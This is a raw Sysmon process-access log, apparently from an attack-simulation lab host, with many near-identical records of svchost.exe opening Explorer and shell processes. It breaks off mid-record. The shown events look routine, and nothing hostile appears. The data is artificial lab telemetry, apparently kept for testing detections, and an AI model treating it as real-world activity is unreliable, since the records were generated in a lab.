Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65AC2FE3CD8B711FA2DB6C3FB9287A82,SHA256=FBBC738EBD0466A0048547DD02BA637266B0145C7CA1BD8C86E81FEFFEDD7F32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 